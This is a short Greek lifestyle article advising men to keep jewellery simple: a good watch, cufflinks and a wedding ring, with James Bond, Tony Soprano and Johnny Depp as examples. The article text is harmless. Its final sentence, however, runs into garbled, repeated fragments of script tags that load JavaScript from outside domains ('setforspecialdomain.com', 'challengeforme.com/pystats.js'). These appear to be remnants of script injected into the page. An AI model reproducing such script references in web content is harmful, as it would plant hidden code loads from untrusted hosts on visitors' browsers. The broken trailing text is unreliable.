Τα κοσμήματα των αντρών

Τα κοσμήματα των αντρών

Τα κοσμήματα είναι μία πολύ σοβαρή υπόθεση για τις γυναίκες, ωστόσο είναι μία απλούστερη υπόθεση για τους άντρες.

«Όσο πιο απλά τόσο πιο καλά», είναι η συμβουλή που δίνει αμερικανική ιστοσελίδα για άντρες και, όπως υποστηρίζει, ισχύει γενικά για τα αντρικά αξεσουάρ.

Για τους περισσότερους άντρες, τα σωστά κοσμήματα είναι τα εξής τρία: Ένα καλό ρολόι, ένα ζευγάρι μανικετόκουμπα και, αν είναι παντρεμένοι, η βέρα. Και ποιος είναι ο λόγος; Εκτός αν είναι κανείς σταρ, επαγγελματίας αθλητής ή… πειρατής, τότε τα κοσμήματα είναι κάτι απλά υπερβολικό.

Τα σκουλαρίκια, οι αλυσίδες στο λαιμό, αλλά και στα χέρια δείχνουν εκτός τόπου και χρόνου στους άντρες που τα φορούν. Ένας άντρας με αλυσίδες και σκουλαρίκια δε μοιάζει στον Τζέιμς Μποντ, αλλά στο μαφιόζο, Τόνι Σοπράνο. Βέβαια, αυτό δε σημαίνει ότι τα αντρικά αξεσουάρ πρέπει να είναι βαρετά. Υπάρχει χώρος για ιδιαίτερα αξεσουάρ, ενώ οι επιλογές για παράδειγμα σε ρολόγια είναι αμέτρητες.

Βέβαια οι κανόνες είναι για να σπάνε. Υπάρχουν άντρες, όπως ο Τζόινι Ντεπ, που μπορούν να φοράνε όσα κοσμήματα θέλουν. Ωστόσο, πρέπει να ξεχειλίζει κανείς από προσωπικότητα για να μπορεί να υποστηρίξει αυτό το στιλ, χωρίς να γίνει γελοίος.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >